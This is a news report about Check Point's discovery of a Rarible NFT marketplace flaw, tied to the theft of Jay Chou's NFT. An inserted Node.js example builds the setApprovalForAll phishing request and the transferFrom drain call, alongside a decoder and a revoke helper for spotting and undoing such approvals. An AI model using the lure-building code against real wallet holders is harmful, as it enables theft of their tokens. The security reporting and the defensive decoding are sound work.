
Star loses $500,000 NFT after crooks exploit Rarible market

Miscreants exploited a now-fixed design flaw in the Rarible NFT marketplace to steal a non-fungible token from Taiwanese singer and actor Jay Chou and sell it for about $500,000.

That’s according to folks at Check Point, who on Thursday said the vulnerability could have been abused by crooks to gain full control of victims’ marketplace accounts and the funds in them. Earlier this month, Chou said his NFT was stolen in what looked like a phishing attack.

When researchers Roman Zaikin, Dikla Barda and Oded Vanunu investigated the security shortcoming, they found that fraudsters could lure users into clicking a link to a malicious NFT and, from there, take control of their marks’ Rarible accounts by abusing a token standard called EIP-721.

This standard (better known as ERC-721) is what most NFTs use to track ownership and transfers, and it includes a function called setApprovalForAll. That function designates an "operator" address that is allowed to move every token the caller owns in that contract, and it exists primarily so that third parties such as Rarible and OpenSea can list and transfer tokens on behalf of users, according to Check Point.

“This function is very dangerous by design because this may allow anyone to control your NFTs if you get tricked into signing it,” the researcher trio said. “It’s not always clear to users exactly what permissions they are giving by signing a transaction. Most of the time, the victim assumes these are regular transactions when in fact, they were giving control over their own NFTs.”

Attackers already use these types of transactions in phishing attacks, but they become more dangerous when an NFT marketplace is involved. The threat hunters noted that Rarible lets anyone create and sell art, which can be any file with a PNG, GIF, SVG, MP4, WEBM or MP3 extension up to a maximum size of 100MB.

So they created an SVG file carrying a simple payload. Whenever a victim clicked on the art and opened it in another tab, or followed its IPFS link, the JavaScript embedded in the SVG would execute.

It’s an easy lure because what’s “so great about [a] wallet transaction is it doesn’t have to run under the same domain, so we don’t need any private information such as cookies or sessions,” they wrote. “All the victim needs is a wallet and the attacker will use the JSON-RPC to abuse it.”

The Check Point payload first enumerated the NFTs the victim held, using the tokennfttx API call, and then asked the user’s wallet to sign a setApprovalForAll transaction for the NFT contract it wanted. By clicking the “confirm” button, the user grants the attacker’s address full control of every NFT they own under the contract named in that transaction.

The attacker can then move all of the NFTs under that contract to their own account by calling the contract’s transferFrom function, because the victim has unwittingly authorized them to do so.
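To make the two ERC-721 calls above concrete, here is an added Node.js example that is not code from Check Point, Rarible or the original article. It ABI-encodes the setApprovalForAll request a malicious page would hand to the wallet over JSON-RPC, the transferFrom call that drains tokens once the approval is granted, and the matching revoke; it also decodes such a request the way a wallet or a cautious user would want to before pressing confirm. The contract and wallet addresses are constructed placeholders, the token ID and the helper names (word, buildSetApprovalForAll, describeRequest, toJsonRpc) are this example’s own, and the 4-byte selectors are the standard ERC-721 ones.

```javascript
// Added example, not Check Point's or Rarible's code. Uses only Node built-ins.
// Addresses below are constructed placeholders, not real contracts or wallets.

// 4-byte selectors from the ERC-721 (EIP-721) ABI:
//   keccak256("setApprovalForAll(address,bool)")[0..4]        -> a22cb465
//   keccak256("transferFrom(address,address,uint256)")[0..4]  -> 23b872dd
const SEL_SET_APPROVAL_FOR_ALL = "a22cb465";
const SEL_TRANSFER_FROM = "23b872dd";

// ABI-encode an address (hex string) or an integer as one 32-byte word.
function word(value) {
  const hex = typeof value === "bigint" || typeof value === "number"
    ? BigInt(value).toString(16)
    : value.toLowerCase().replace(/^0x/, "");
  if (hex.length > 64) throw new Error("value does not fit in one ABI word");
  return hex.padStart(64, "0");
}

// The transaction the lure asks the wallet to sign. Note what it says:
// "operator" may move EVERY token the signer owns in "nftContract".
function buildSetApprovalForAll(nftContract, operator, approved) {
  return {
    to: nftContract,
    data: "0x" + SEL_SET_APPROVAL_FOR_ALL + word(operator) + word(approved ? 1 : 0),
  };
}

// After approval, the operator drains tokens one by one with transferFrom.
function buildTransferFrom(nftContract, from, to, tokenId) {
  return {
    to: nftContract,
    data: "0x" + SEL_TRANSFER_FROM + word(from) + word(to) + word(tokenId),
  };
}

// Revoking is the same call with approved = false; this is what a
// token-approval checker submits on the user's behalf.
function buildRevokeApproval(nftContract, operator) {
  return buildSetApprovalForAll(nftContract, operator, false);
}

// How the payload hands the transaction to the wallet: a JSON-RPC
// eth_sendTransaction request. No cookies or session needed, only a wallet.
function toJsonRpc(from, tx) {
  return { jsonrpc: "2.0", id: 1, method: "eth_sendTransaction",
           params: [{ from, to: tx.to, data: tx.data }] };
}

// What a wallet (or a user reading the raw request) should check before
// clicking "confirm": is this a blanket operator approval, and for whom?
function describeRequest(tx) {
  const data = tx.data.replace(/^0x/, "").toLowerCase();
  const selector = data.slice(0, 8);
  const args = data.slice(8);
  if (selector === SEL_SET_APPROVAL_FOR_ALL && args.length === 128) {
    const operator = "0x" + args.slice(24, 64);            // low 20 bytes of word 0
    const approved = BigInt("0x" + args.slice(64, 128)) !== 0n; // word 1
    return { kind: "setApprovalForAll", contract: tx.to, operator, approved,
             risk: approved
               ? "HIGH: grants operator control of ALL your tokens in this contract"
               : "revokes operator" };
  }
  if (selector === SEL_TRANSFER_FROM && args.length === 192) {
    return { kind: "transferFrom", contract: tx.to,
             from: "0x" + args.slice(24, 64),
             to: "0x" + args.slice(88, 128),
             tokenId: BigInt("0x" + args.slice(128, 192)),
             risk: "moves one token" };
  }
  return { kind: "unknown", contract: tx.to,
           risk: "unrecognised calldata; reject if you did not expect it" };
}

// Constructed placeholder addresses and token ID for the walk-through.
const NFT_CONTRACT = "0x1111111111111111111111111111111111111111";
const VICTIM = "0x2222222222222222222222222222222222222222";
const ATTACKER = "0x3333333333333333333333333333333333333333";

const lure = buildSetApprovalForAll(NFT_CONTRACT, ATTACKER, true);
console.log(JSON.stringify(toJsonRpc(VICTIM, lure)));
console.log(describeRequest(lure));
console.log(describeRequest(buildTransferFrom(NFT_CONTRACT, VICTIM, ATTACKER, 42)));
console.log(describeRequest(buildRevokeApproval(NFT_CONTRACT, ATTACKER)));
```

The point of describeRequest is that the wallet prompt for the lure looks like any other transaction, but the calldata is unambiguous: selector a22cb465 with a non-zero second word is a blanket operator grant, and the operator address is right there in the first word. A user who cannot name the operator should reject it.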

Check Point alerted Rarible to the vulnerability and worked with the marketplace to create a fix. A spokesperson for Rarible was not available for immediate comment.

Easy pickings in nascent market

The flaw put a focus on how vulnerable the relatively nascent NFT and cryptocurrency sectors are to bad actors seeking a quick payday, and on how much security measures in the space still need to harden, according to the Check Point team.

“Blockchain innovation is fast underway and NFTs are here to stay,” they wrote. “Given the sheer pace of innovation, there is an inherent challenge in securely integrating software applications and crypto markets. Threat actors know they have an open window right now to take advantage of, with consumer adoption spiking, while security measures in this space still need to catch up.”

They said cybersecurity professionals need to develop new ways to better secure blockchain technologies to secure people’s cryptocurrency assets.

The threat is out there. In February, 17 users of the OpenSea NFT marketplace were scammed out of $1.7 million in a phishing attack that allowed hackers to steal hundreds of NFTs. Another 15 users interacted with the attackers but didn’t lose tokens.

Nick Donarski, founder and CTO of blockchain company ORE System, wrote in a column last month about the security issues surrounding NFTs.

“Each NFT comes integrated with a unique signature to verify its authenticity and uniqueness, as well as its chain of ownership, meaning that these assets (much like the cryptocurrencies they are bought with) are noninterchangeable,” Donarski wrote. “However, no technology is inherently secure or infallible. Because NFTs are still a relatively new innovation, there are a number of risks associated with their creation, use, and trade.”

The sheer demand for NFTs also makes them an attractive target. According to Check Point, Rarible has more than 2.1 million users and saw more than $273 million worth of NFTs traded in 2021. The marketplace also supports three blockchains with more than 400,000 NFTs minted. NFT creators also can earn up to 50 percent in royalties when someone resells their NFT on the secondary market.

The popularity of NFTs and cryptocurrency is being driven by non-technical people, “so even if the underlying technology is reasonably secure, threat actors can still fall back to phishing or social engineering to exploit their victims,” Mike Parkin, senior technical engineer at Vulcan Cyber, told The Register.

Karl Steinkamp, director at cybersecurity advisory Coalfire, told The Register that companies in the digital assets space need to find a balance between fast innovation and security. Ethereum-based blockchains and technologies, like NFTs, tend to move swiftly and “often break stuff along the way,” he said.

“On the other hand, we have bitcoin, that while it does innovate, it does so glacially and intentionally very slow,” Steinkamp said. “Due to its upgrade processes, bitcoin is far more stable and resistant to attacks than other crypto assets.”

Users need to be careful when asked to sign any request within Rarible or other marketplaces, according to Check Point. Before approving a request, they should understand exactly what is being requested and whether it seems suspicious.

If there are doubts, the user should reject the request. They can also use a token approval checker site to review which operators currently hold approvals over their tokens and revoke any they do not recognise. ®